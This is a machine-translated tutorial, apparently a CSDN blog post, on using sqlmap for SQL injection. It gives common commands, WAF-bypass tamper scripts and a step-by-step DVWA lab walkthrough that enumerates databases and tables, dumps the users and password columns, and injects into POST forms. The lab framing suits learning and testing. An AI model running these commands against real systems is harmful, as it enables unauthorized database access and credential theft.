Common commands

python sqlmap.py -u "?" -cookie "?" --level 5 --current-db
python sqlmap.py -u "?" -cookie "?" --level 5 -T $ --tables
python sqlmap.py -u "?" -cookie "?" --level 5 -D $ -T $ --columns
python sqlmap.py -u "?" -cookie "?" --level 5 -D $ -T $ -C $ --dump

// hold cookie It's convenient to take it for inspection cookie Inject 
// --level 5  It means there are tests  user-agent
//  Around the space : --tamper "space2comment.py"

  Common bypass scripts

sqlmap --tamper Bypass WAF Script sorting _whatday The blog of -CSDN Blog _sqlmap Script

SQLMap Learn about common scripts _three_years_No1 The blog of -CSDN Blog _sqlmap Frequently used scripts

sqlmap download ：

​​​​​​​sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool (github.com)

start-up ：

1. Set it up in advance python Environmental Science

2. stay sqlmap Under the root directory of , Write a bat Processing documents

@echo off
cmd /k "python sqlmap.py -h"

Such as ：

Double click bat File to start  

Chinese version options ：

python sqlmap.py -h  Check the original help manual 

Chinese version of the original link ：https://blog.csdn.net/smli_ng/article/details/106026901

Common sentences

With dvwa Range low Grade SQL Injection For example

1. Enter a random number first , Get injected url

 2. Copy url, To sqlmap To be used in

3. Classic four steps ： Database search , Look up the table , Check field , Check data

Database search ：

Check all databases

python sqlmap.py -u "http://39.101.162.123:44729/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4d099mj6tpcq8j3q17r8gtuhj2; security=low" --dbs

  Check the current database

python sqlmap.py -u "http://39.101.162.123:44729/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4d099mj6tpcq8j3q17r8gtuhj2; security=low" --current-db

dvwa Is the currently connected database  

Look up the table , List

python sqlmap.py -u "http://39.101.162.123:44729/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4d099mj6tpcq8j3q17r8gtuhj2; security=low" --tables --columns

Pictured , The columns and tables come out directly  

Check data

Obviously, what we should check is dvwa Under the users Under the user and password

python sqlmap.py -u "http://39.101.162.123:44729/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4d099mj6tpcq8j3q17r8gtuhj2; security=low" -D dvwa -T users -C user,password --dump

Pictured , And here it is  

Post Type injection

And get Different types , because get The parameters of type are in url bar ,

1.

python sqlmap.py -u "???" -cookie="???" --forms

--forms Namely sqlmap Automatically collect forms

2. Specify the parameters

python sqlmap.py -u "??" --data "n=1"
 perhaps 
python sqlmap.py -u "??" --data "n=1&m=1"